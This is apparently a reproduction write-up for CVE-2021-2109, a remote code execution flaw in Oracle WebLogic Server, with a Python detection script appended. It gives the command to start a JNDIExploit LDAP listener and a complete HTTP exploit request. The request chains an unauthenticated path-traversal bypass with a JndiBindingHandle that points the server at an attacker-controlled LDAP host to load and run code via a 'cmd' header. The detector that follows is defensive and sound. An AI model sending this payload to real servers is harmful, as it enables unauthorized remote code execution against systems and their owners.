CVE-2021-2109 WebLogic Server Remote Code Execution Vulnerability Reproduction
For reproduction purposes only
Affected versions
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
Environment setup
Use the '.\vulhub-master\weblogic\CVE-2020-14882' vulnerable environment directly
https://github.com/vulhub/vulhub
java version “1.8.0_151”
WebLogic Server version: 12.2.1.3.0
Start the LDAP listener
GitHub repository
https://github.com/feihong-cs/JNDIExploit
java -jar JNDIExploit-v1.11.jar -i 10.10.10.10
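Send the payload
Because this version is also affected by the CVE-2020-14882 and CVE-2020-14883 unauthenticated-access vulnerabilities, the issue can be verified in combination with them, without logging in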
POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1
Host: 10.10.99.196:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=QOBObrqaFesoHZn2CPYDDiURPTylOq28vVljbn-u242XLuXB8bNP!-1825720843
cmd:id
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.10.10.10;10:1389/Basic/WeblogicEcho;AdminServer%22)
Note that in ldap://10.10.10.10;10:1389 the ";" is a semicolon, not a "."
Request received
References:
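For detection, the request above carries several distinctive markers: the double-encoded traversal under /console/, the consolejndi.portal page, and a JndiBindingHandle holding a remote URL with a semicolon in the host. The Python check below looks for those markers; it is an added example, not part of the original post, and its function names, marker labels and sample requests (192.0.2.x documentation addresses, placeholder object path) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# JndiBindingHandle argument that points at a remote naming service.
JNDI_HANDLE = re.compile(
    r'JndiBindingHandle\(\s*"(?P<url>(?:ldaps?|rmi|iiop)://[^"]*)"', re.I)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(raw):
    """Return the markers found in one raw HTTP request (headers + body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    _method, target, *_ = head.splitlines()[0].split(" ")
    path, _, query = target.partition("?")
    path = decode_fully(path).lower()
    findings = []
    if path.startswith("/console/") and "../" in path:
        findings.append("console-path-traversal")
    if path.endswith("/consolejndi.portal"):
        findings.append("consolejndi-portal")
    match = JNDI_HANDLE.search(decode_fully(query + "&" + body))
    if match:
        findings.append("remote-jndi-handle")
        host = match.group("url").split("://", 1)[1].split("/", 1)[0]
        if ";" in host:  # the semicolon-for-dot form noted on this page
            findings.append("semicolon-in-host")
    return findings

# Constructed sample requests (documentation addresses, placeholder object path).
SUSPICIOUS = (
    "POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1\r\n"
    "Host: 192.0.2.50:7001\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle="
    "com.bea.console.handles.JndiBindingHandle(%22ldap://192.0.2;10:1389/obj;AdminServer%22)"
)
BENIGN = "GET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: 192.0.2.50:7001\r\n\r\n"

if __name__ == "__main__":
    print(inspect_request(SUSPICIOUS))
    print(inspect_request(BENIGN))
```

The same markers can be applied to proxy or WAF logs that record the request path and body; access logs that store only the path will still show the first two.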
https://mp.weixin.qq.com/s/ls9Qo4uBE-V0zaNx6_TLuA
https://www.o2oxy.cn/3019.html